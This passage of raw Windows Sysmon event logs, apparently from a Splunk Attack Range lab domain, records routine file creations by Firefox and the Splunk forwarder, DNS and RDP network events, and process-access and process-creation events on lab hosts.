Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=C0651B0CB496569EC5EA27EA4A2E579C,SHA256=8280063A02D54619C51F0B1EA4B4FF356E88D6AD8BD2C6A9DBD4705A0CD1025F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045548Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:42:48.823{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=0F0F38DA28A88832B17B5700073A183A,SHA256=8041AD64BA212FA8608D97E48CA5D7A37531564920B420ED57FB9C05C142BE16,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045547Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:42:48.807{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Local\Mozilla\Firefox\Profiles\bnjry9g4.default-release\safebrowsing-updating\google4\goog-unwanted-proto.metadataMD5=B291AD81803C87DF795FD2D4B46F728C,SHA256=E30C60296F8C2538DE9194FEFEFC2E7BF645804CF341ED524C52CA0A98E89484,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045546Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:42:48.807{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Local\Mozilla\Firefox\Profiles\bnjry9g4.default-release\safebrowsing-updating\google4\goog-unwanted-proto-1.vlpsetMD5=D41D8CD98F00B204E9800998ECF8427E,SHA256=E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045545Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:42:48.791{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla 
Firefox\firefox.exeC:\Users\bob\AppData\Local\Mozilla\Firefox\Profiles\bnjry9g4.default-release\safebrowsing-updating\google4\goog-malware-proto.metadataMD5=23F92D6A4085DA3A049409C9EF6E6F24,SHA256=9F6D9C12BB68A8D0EE3F884519916D7F3D174C4F85BFE2BD208CE27A4D1E1D9D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045544Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:42:48.791{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Local\Mozilla\Firefox\Profiles\bnjry9g4.default-release\safebrowsing-updating\google4\goog-malware-proto-1.vlpsetMD5=D41D8CD98F00B204E9800998ECF8427E,SHA256=E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045543Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:42:48.790{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Local\Mozilla\Firefox\Profiles\bnjry9g4.default-release\safebrowsing-updating\google4\goog-phish-proto.metadataMD5=0E6406BCED06B69AEB6C8CA463C0EBAB,SHA256=884CCC1F3FAAB666B5DAE09256AD409EE961AC8E8EB0DF4B9144DF09CFDD0035,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045542Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:42:48.748{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Local\Mozilla\Firefox\Profiles\bnjry9g4.default-release\safebrowsing-updating\google4\goog-phish-proto-1.vlpsetMD5=D41D8CD98F00B204E9800998ECF8427E,SHA256=E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000805839Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:42:49.064{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=588B2AF42C3C29382F84D72CF27C6B54,SHA256=C7C3D990676C37C6273F7BA0F506FA7AAC3C99D8F4E44E4B894749EE5AA89034,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045602Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:42:49.538{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\prefs-1.jsMD5=D41D8CD98F00B204E9800998ECF8427E,SHA256=E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001045601Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:42:40.947{466BC892-02BC-60E8-2D00-00000000CF01}1840C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-890.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-890.attackrange.local64659- 354300x80000000000000001045600Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:42:40.945{466BC892-02BC-60E8-2D00-00000000CF01}1840C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-890.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-890.attackrange.local62188- 354300x80000000000000001045599Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:42:40.446{466BC892-02AF-60E8-0F00-00000000CF01}360C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse195.78.54.188-31405-false10.0.1.14win-dc-890.attackrange.local3389ms-wbt-server 23542300x80000000000000001045598Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:42:49.022{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Local\Mozilla\Firefox\Profiles\bnjry9g4.default-release\safebrowsing-updating\social-tracking-protection-twitter-digest256.vlpsetMD5=4389884605AD56EC50BF27FBD4CFB473,SHA256=60B552CBA048738FE850BA958CDDF9B742B6FAA7519F455D4B39437734725990,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045597Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:42:49.007{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Local\Mozilla\Firefox\Profiles\bnjry9g4.default-release\safebrowsing-updating\social-tracking-protection-twitter-digest256.sbstoreMD5=3F92B621E1581AD764BE2EC57381AF23,SHA256=18FBBA6D350213F61DF718195FD2B38A3B8344D0A5C22C2713E6F8944E9A9DD4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045596Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:42:49.007{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Local\Mozilla\Firefox\Profiles\bnjry9g4.default-release\safebrowsing-updating\social-tracking-protection-linkedin-digest256.vlpsetMD5=8D76E0D31A687AE5A730C71C052C68E8,SHA256=6747A2FB92023CBF27E345AAC38B2BA7695A7DC5E9A42BD793D0CF6DAEAED260,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045595Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:42:49.007{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla 
Firefox\firefox.exeC:\Users\bob\AppData\Local\Mozilla\Firefox\Profiles\bnjry9g4.default-release\safebrowsing-updating\social-tracking-protection-linkedin-digest256.sbstoreMD5=DC7308A91A03C92D7329F37F15C7AC82,SHA256=180DDE904FFF036ABD4045A52850200ACA369E4577E14E0675E5298855A6AA0C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045594Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:42:49.007{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Local\Mozilla\Firefox\Profiles\bnjry9g4.default-release\safebrowsing-updating\social-tracking-protection-facebook-digest256.vlpsetMD5=54971F1ADD787A9676F9DEFAB4C7FE3F,SHA256=FD890E3920CDFB62C1089C6119A8F8B713F81BDDAF7BEC925AFB4BDFB32AF5E6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045593Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:42:49.007{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Local\Mozilla\Firefox\Profiles\bnjry9g4.default-release\safebrowsing-updating\social-tracking-protection-facebook-digest256.sbstoreMD5=0A19E4A237D65FF069452EF5201F217E,SHA256=AC5D43328F28E2B1159D014197F58D987C2AB78C9179DCD924524353571FA604,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045592Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:42:49.007{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Local\Mozilla\Firefox\Profiles\bnjry9g4.default-release\safebrowsing-updating\social-track-digest256.vlpsetMD5=D95F203FEE1C8FAE222EF4C6D410971B,SHA256=1CA57763647104AEF83C8A86E8366FBBEE4BAA88C900C7AF66F437720319CEAB,IMPHASH=00000000000000000000000000000000falsetrue 
23542300x80000000000000001045591Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:42:49.007{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Local\Mozilla\Firefox\Profiles\bnjry9g4.default-release\safebrowsing-updating\social-track-digest256.sbstoreMD5=C0FE3CB314FDF424A4D4F1DE2801A4DF,SHA256=C4CA8CE5B3B8D038E3348887BDA7634D1949325BB95A68D17184D2A99F37E810,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045590Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:42:49.007{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Local\Mozilla\Firefox\Profiles\bnjry9g4.default-release\safebrowsing-updating\mozstd-trackwhite-digest256.vlpsetMD5=8F1AF05E946BCD9711A1CDE1B1ED6C95,SHA256=0F5C8864E17307F3C8CE1D35AC4770D0C1C34F8CDB3FC7404F2114B4E0FD93BF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045589Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:42:49.007{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Local\Mozilla\Firefox\Profiles\bnjry9g4.default-release\safebrowsing-updating\mozstd-trackwhite-digest256.sbstoreMD5=B91E9842F81EE5668B68C0B5B561010A,SHA256=19F7DFB5FC8E587C8D48DC8A779B07E1C11CCD772A7B68025146FF0A335B54CB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045588Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:42:49.007{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla 
Firefox\firefox.exeC:\Users\bob\AppData\Local\Mozilla\Firefox\Profiles\bnjry9g4.default-release\safebrowsing-updating\mozplugin-block-digest256.vlpsetMD5=FCC9C2C9B611A3264B68EBE180EB4248,SHA256=6ECD378A537EEFE350B45CFA353741383F407D99D776BF23155A7825DC5DD2BC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045587Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:42:49.007{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Local\Mozilla\Firefox\Profiles\bnjry9g4.default-release\safebrowsing-updating\mozplugin-block-digest256.sbstoreMD5=519BEB1B01FC355BB388F1F75BE997FD,SHA256=FFE2D3077B81AE6F51B220C1C661B276C823FA67DAD1D64FC5F17249FC54BDC0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045586Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:42:49.007{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Local\Mozilla\Firefox\Profiles\bnjry9g4.default-release\safebrowsing-updating\google4\goog-unwanted-proto.vlpsetMD5=6CBD94D3D2878BBE7EE0E707A97C3307,SHA256=F3B68CF7458532B88D77ECF652721AE743D4E7C60A8D44D16872158E66E9D903,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045585Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:42:49.007{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Local\Mozilla\Firefox\Profiles\bnjry9g4.default-release\safebrowsing-updating\google4\goog-unwanted-proto.metadataMD5=B291AD81803C87DF795FD2D4B46F728C,SHA256=E30C60296F8C2538DE9194FEFEFC2E7BF645804CF341ED524C52CA0A98E89484,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045584Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:42:49.007{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Local\Mozilla\Firefox\Profiles\bnjry9g4.default-release\safebrowsing-updating\google4\goog-phish-proto.vlpsetMD5=1D05EADF8B5987C12351E95499404B05,SHA256=1E4CD89907C8B6E7314B8D0267A44347017F93A61A13548402B10B4F5EA1FB4D,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001045621Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:42:50.869{466BC892-02BD-60E8-3500-00000000CF01}32483268C:\Windows\system32\conhost.exe{466BC892-F27A-60EB-DE7C-00000000CF01}10108C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001045620Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:42:50.869{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001045619Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:42:50.869{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001045618Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:42:50.869{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001045617Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:42:50.869{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001045616Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:42:50.869{466BC892-02AD-60E8-0500-00000000CF01}408476C:\Windows\system32\csrss.exe{466BC892-F27A-60EB-DE7C-00000000CF01}10108C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001045615Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:42:50.869{466BC892-02BC-60E8-2A00-00000000CF01}29283252C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{466BC892-F27A-60EB-DE7C-00000000CF01}10108C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001045614Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:42:50.854{466BC892-F27A-60EB-DE7C-00000000CF01}10108C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{466BC892-02AD-60E8-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000001045613Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:42:50.453{466BC892-F27A-60EB-DD7C-00000000CF01}48489928C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 354300x80000000000000001045612Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:42:40.948{466BC892-3462-60E8-100C-00000000CF01}8944C:\Program Files\Mozilla Firefox\firefox.exeATTACKRANGE\bobtcptruefalse10.0.1.14win-dc-890.attackrange.local50883-false172.217.16.138zrh04s06-in-f138.1e100.net443https 10341000x80000000000000001045611Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:42:50.190{466BC892-02BD-60E8-3500-00000000CF01}32483268C:\Windows\system32\conhost.exe{466BC892-F27A-60EB-DD7C-00000000CF01}4848C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001045610Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:42:50.190{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001045609Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:42:50.190{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001045608Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:42:50.190{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001045607Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 